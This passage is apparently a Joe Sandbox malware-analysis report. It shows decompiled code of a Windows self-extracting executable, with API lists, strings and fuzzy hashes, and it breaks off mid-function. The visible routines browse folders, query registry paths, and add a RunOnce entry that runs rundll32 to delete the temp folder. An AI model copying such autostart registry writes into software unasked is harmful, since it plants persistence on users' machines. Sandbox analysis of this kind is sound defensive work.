                                                                                                                                                                                                                                            				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                                                            				if(_t66 == 0) {
                                                                                                                                                                                                                                            					_t63 = 0x4c2;
                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                            					E00A044B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                                                            				_v12 = _t26;
                                                                                                                                                                                                                                            				if(_t26 == 0) {
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					FreeLibrary(_t66);
                                                                                                                                                                                                                                            					_t63 = 0x4c1;
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                                                            				_v20 = _t28;
                                                                                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                                                            				_v16 = _t29;
                                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t76 =  *0xa088c0; // 0x0
                                                                                                                                                                                                                                            				if(_t76 != 0) {
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					 *0xa087a0 = 0;
                                                                                                                                                                                                                                            					_v52 = _t67;
                                                                                                                                                                                                                                            					_v48 = 0;
                                                                                                                                                                                                                                            					_v44 = 0;
                                                                                                                                                                                                                                            					_v40 = 0xa08598;
                                                                                                                                                                                                                                            					_v36 = 1;
                                                                                                                                                                                                                                            					_v32 = E00A04200;
                                                                                                                                                                                                                                            					_v28 = 0xa088c0;
                                                                                                                                                                                                                                            					 *0xa0a288( &_v52);
                                                                                                                                                                                                                                            					_t32 =  *_v12();
                                                                                                                                                                                                                                            					if(_t71 != _t71) {
                                                                                                                                                                                                                                            						asm("int 0x29");
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_v12 = _t32;
                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                            						 *0xa0a288(_t32, 0xa088c0);
                                                                                                                                                                                                                                            						 *_v16();
                                                                                                                                                                                                                                            						if(_t71 != _t71) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if( *0xa088c0 != 0) {
                                                                                                                                                                                                                                            							E00A01680(0xa087a0, 0x104, 0xa088c0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa0a288(_v12);
                                                                                                                                                                                                                                            						 *_v20();
                                                                                                                                                                                                                                            						if(_t71 != _t71) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					FreeLibrary(_t66);
                                                                                                                                                                                                                                            					_t85 =  *0xa087a0; // 0x0
                                                                                                                                                                                                                                            					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					GetTempPathA(0x104, 0xa088c0);
                                                                                                                                                                                                                                            					_t61 = 0xa088c0;
                                                                                                                                                                                                                                            					_t4 =  &(_t61[1]); // 0xa088c1
                                                                                                                                                                                                                                            					_t65 = _t4;
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t42 =  *_t61;
                                                                                                                                                                                                                                            						_t61 =  &(_t61[1]);
                                                                                                                                                                                                                                            					} while (_t42 != 0);
                                                                                                                                                                                                                                            					_t5 = _t61 - _t65 + 0xa088c0; // 0x1411181
                                                                                                                                                                                                                                            					_t44 = CharPrevA(0xa088c0, _t5);
                                                                                                                                                                                                                                            					_v8 = _t44;
                                                                                                                                                                                                                                            					if( *_t44 == 0x5c &&  *(CharPrevA(0xa088c0, _t44)) != 0x3a) {
                                                                                                                                                                                                                                            						 *_v8 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00A04236
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00A0424C
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00A04263
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00A0427A
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,00A088C0,?,00000001), ref: 00A0429F
                                                                                                                                                                                                                                            • CharPrevA.USER32(00A088C0,01411181,?,00000001), ref: 00A042C2
                                                                                                                                                                                                                                            • CharPrevA.USER32(00A088C0,00000000,?,00000001), ref: 00A042D6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A04391
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A043A5
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                            • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                            • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                            • Opcode ID: 73c4fb64d02f9b1a9ced7e44d0cc332d7c9f98011597eb388dce863699f9b223
                                                                                                                                                                                                                                            • Instruction ID: 3b246b0cba4948172f8dff357d6acf00f23d9668352a54c9ae2203015d1da23e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 73c4fb64d02f9b1a9ced7e44d0cc332d7c9f98011597eb388dce863699f9b223
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C341E6B4A0030CAFE7119FA0FC94AAE7BB4FB5D344F444569EA81672D1CB788C068766
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A02773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v269;
                                                                                                                                                                                                                                            				CHAR* _v276;
                                                                                                                                                                                                                                            				int _v280;
                                                                                                                                                                                                                                            				void* _v284;
                                                                                                                                                                                                                                            				int _v288;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				int _t45;
                                                                                                                                                                                                                                            				int* _t50;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				CHAR* _t61;
                                                                                                                                                                                                                                            				char* _t62;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t52 = __ecx;
                                                                                                                                                                                                                                            				_t23 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                            				_t62 = _a4;
                                                                                                                                                                                                                                            				_t50 = 0;
                                                                                                                                                                                                                                            				_t61 = __ecx;
                                                                                                                                                                                                                                            				_v276 = _t62;
                                                                                                                                                                                                                                            				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                            				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                            					_t63 = 0x104;
                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t64 = _t62 + 1;
                                                                                                                                                                                                                                            					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                            					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                            					_t63 = 0x104;
                                                                                                                                                                                                                                            					_t34 = _v269;
                                                                                                                                                                                                                                            					if(_t34 == 0x53) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                            						goto L15;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_t34 == 0x57) {
                                                                                                                                                                                                                                            							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(_t52);
                                                                                                                                                                                                                                            							_v288 = 0x104;
                                                                                                                                                                                                                                            							E00A01781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                            							_t59 = 0x104;
                                                                                                                                                                                                                                            							E00A0658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                            							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                                                            								L16:
                                                                                                                                                                                                                                            								_t59 = _t63;
                                                                                                                                                                                                                                            								E00A0658A(_t61, _t63, _v276);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								if(RegQueryValueExA(_v284, 0xa01140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                                                            									_t45 = _v280;
                                                                                                                                                                                                                                            									if(_t45 != 2) {
                                                                                                                                                                                                                                            										L9:
                                                                                                                                                                                                                                            										if(_t45 == 1) {
                                                                                                                                                                                                                                            											goto L10;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            											_t45 = _v280;
                                                                                                                                                                                                                                            											goto L9;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t59 = 0x104;
                                                                                                                                                                                                                                            											E00A01680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                                                            											L10:
                                                                                                                                                                                                                                            											_t50 = 1;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								RegCloseKey(_v284);
                                                                                                                                                                                                                                            								L15:
                                                                                                                                                                                                                                            								if(_t50 == 0) {
                                                                                                                                                                                                                                            									goto L16;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a027db
                                                                                                                                                                                                                                            0x00a027dd
                                                                                                                                                                                                                                            0x00a028aa
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a027e3
                                                                                                                                                                                                                                            0x00a027e3
                                                                                                                                                                                                                                            0x00a027ec
                                                                                                                                                                                                                                            0x00a027f8
                                                                                                                                                                                                                                            0x00a02803
                                                                                                                                                                                                                                            0x00a0280b
                                                                                                                                                                                                                                            0x00a02831
                                                                                                                                                                                                                                            0x00a028c3
                                                                                                                                                                                                                                            0x00a028c9
                                                                                                                                                                                                                                            0x00a028cd
                                                                                                                                                                                                                                            0x00a02837
                                                                                                                                                                                                                                            0x00a0285a
                                                                                                                                                                                                                                            0x00a0285c
                                                                                                                                                                                                                                            0x00a02865
                                                                                                                                                                                                                                            0x00a02892
                                                                                                                                                                                                                                            0x00a02895
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02867
                                                                                                                                                                                                                                            0x00a02878
                                                                                                                                                                                                                                            0x00a0288c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0287a
                                                                                                                                                                                                                                            0x00a02880
                                                                                                                                                                                                                                            0x00a02885
                                                                                                                                                                                                                                            0x00a02897
                                                                                                                                                                                                                                            0x00a02899
                                                                                                                                                                                                                                            0x00a02899
                                                                                                                                                                                                                                            0x00a02878
                                                                                                                                                                                                                                            0x00a02865
                                                                                                                                                                                                                                            0x00a028a0
                                                                                                                                                                                                                                            0x00a028bf
                                                                                                                                                                                                                                            0x00a028c1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a028c1
                                                                                                                                                                                                                                            0x00a02831
                                                                                                                                                                                                                                            0x00a027dd
                                                                                                                                                                                                                                            0x00a027d5
                                                                                                                                                                                                                                            0x00a028e5

APIs
• CharUpperA.USER32(E10713FE,00000000,00000000,00000000), ref: 00A027A8
• CharNextA.USER32(0000054D), ref: 00A027B5
• CharNextA.USER32(00000000), ref: 00A027BC
• RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A02829
• RegQueryValueExA.ADVAPI32(?,00A01140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A02852
• ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A02870
• RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A028A0
• GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00A028AA
• GetSystemDirectoryA.KERNEL32 ref: 00A028B9
Strings
• Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00A027E4
Memory Dump Source
• Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
Similarity
• API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
• String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
• API String ID: 2659952014-2428544900
• Opcode ID: 958f9b872afc37ed2d6fd6ad65926bae0f7384dc32aee95cc4196c7b049900f9
• Instruction ID: 817e329c8022e757704792cfd3280655b58f2da9eee8c82b906d1a5a1519ad9b
• Opcode Fuzzy Hash: 958f9b872afc37ed2d6fd6ad65926bae0f7384dc32aee95cc4196c7b049900f9
• Instruction Fuzzy Hash: 5C419675A0022CAFDB24DF64AC89BEA77BDEF55700F0480A9F545D2190DB704E878FA1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 62%
                                                                                                                                                                                                                                            			E00A02267() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v836;
                                                                                                                                                                                                                                            				void* _v840;
                                                                                                                                                                                                                                            				int _v844;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t42;
                                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t19 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				if( *0xa08530 != 0) {
                                                                                                                                                                                                                                            					_push(_t49);
                                                                                                                                                                                                                                            					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                            						_push(_t38);
                                                                                                                                                                                                                                            						_v844 = 0x238;
                                                                                                                                                                                                                                            						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                            							_push(_t47);
                                                                                                                                                                                                                                            							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            								E00A0658A( &_v268, 0x104, 0xa01140);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                            							E00A0171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                            							_t42 =  &_v836;
                                                                                                                                                                                                                                            							_t45 = _t42 + 1;
                                                                                                                                                                                                                                            							_pop(_t47);
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t33 =  *_t42;
                                                                                                                                                                                                                                            								_t42 = _t42 + 1;
                                                                                                                                                                                                                                            							} while (_t33 != 0);
                                                                                                                                                                                                                                            							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                            						_pop(_t38);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_pop(_t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00A022A3
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 00A022D8
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A022F5
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A02305
                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00A0236E
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00A0237A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • wextract_cleanup1, xrefs: 00A0227C, 00A022CD, 00A02363
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00A02321
                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00A02299
                                                                                                                                                                                                                                            • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00A0232D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                                                                                                                                                                                            • API String ID: 3027380567-2601155950
                                                                                                                                                                                                                                            • Opcode ID: bfb5033e231e6169f73a4d5a94a1587ad54701c970b7fcb743de390f35d97a15
                                                                                                                                                                                                                                            • Instruction ID: eb38ca96b3538afc2fdda077133c09a733e3885ce8931be7835dbd46aac317e4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bfb5033e231e6169f73a4d5a94a1587ad54701c970b7fcb743de390f35d97a15
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85319571A0031C7BDB21DF51EC89FEB7B7CEB54700F0401A9B54DAA091EA75AB8ACB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                                            			E00A03100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            				struct HWND__* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                            					if( *0xa08590 == 0) {
                                                                                                                                                                                                                                            						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                            						 *0xa08590 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t8 - 1;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                                            					EndDialog(_a4, ??);
                                                                                                                                                                                                                                            					L9:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                            				if(_t15 == 0) {
                                                                                                                                                                                                                                            					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t33 = _a4;
                                                                                                                                                                                                                                            					E00A043D0(_t33, _t16);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t33, 0x834,  *0xa08d4c);
                                                                                                                                                                                                                                            					SetWindowTextA(_t33, "lenta");
                                                                                                                                                                                                                                            					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                            					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                            					 *0xa088b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                            					SetWindowLongA(_t34, 0xfffffffc, E00A030C0);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t15 != 1) {
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a12 != 6) {
                                                                                                                                                                                                                                            					if(_a12 != 7) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				goto L8;
                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00A0313B
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A0314B
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000834), ref: 00A0316A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,lenta), ref: 00A03176
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00A0317D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000834), ref: 00A03185
                                                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000FC), ref: 00A03190
                                                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000FC,00A030C0), ref: 00A031A3
                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00A031CA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                            • String ID: lenta
                                                                                                                                                                                                                                            • API String ID: 3785188418-2780258678
                                                                                                                                                                                                                                            • Opcode ID: 07674ab49649a1a81917347a78dd8e61cfe4ad48f4d8c0ecb01346bafffe99e5
                                                                                                                                                                                                                                            • Instruction ID: 96bc16b275147a1acde23320132d8b9426036b8c142ada7341505768d7a7e693
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07674ab49649a1a81917347a78dd8e61cfe4ad48f4d8c0ecb01346bafffe99e5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE11BE3220421DBBDF11DFA4BC0CB9A3A68FB6E720F100720F855911E0DBB49A83C786
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                                            			E00A018A3(void* __edx, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				void* _t52;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t51 = __esi;
                                                                                                                                                                                                                                            				_t49 = __edx;
                                                                                                                                                                                                                                            				_t23 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                            				_t25 =  *0xa08128; // 0x2
                                                                                                                                                                                                                                            				_t45 = 0;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t50 = 2;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if(_t25 != _t50) {
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					return E00A06CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                            				}
